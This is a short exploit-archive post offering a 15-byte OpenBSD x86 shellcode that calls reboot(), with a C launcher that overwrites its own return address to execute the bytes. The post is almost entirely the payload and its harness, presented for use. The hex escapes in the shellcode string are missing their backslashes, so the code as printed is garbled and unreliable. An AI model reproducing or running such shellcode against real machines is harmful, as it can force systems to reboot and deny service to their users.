bsd/x86 reboot() shellcode 15 bytes
Posted on 22 April 2010
=================================== bsd/x86 reboot() shellcode 15 bytes =================================== # Exploit Title: [bsd/x86 reboot() shellcode 15 bytes] -::OpenBSD reboot() shellcode # Date: [21-04-2010] # Author: -::beosroot # Software Link: [downoad link if available] # Version: [OpenBSD/x86] # Platform / Tested on: [BSD] -::OpenBSD # category: [shellcode] # Code : [ //bsd/x86 reboot() shellcode //by beosroot char shellcode[] = "x31xc0x66xbax0ex27x66x81xeax06x27xb0x37xcdx80"; int main() { int *ret = (int *)&ret + 2; (*ret) = (int)shellcode; } // the end o.O ] # Inj3ct0r.com [2010-04-22]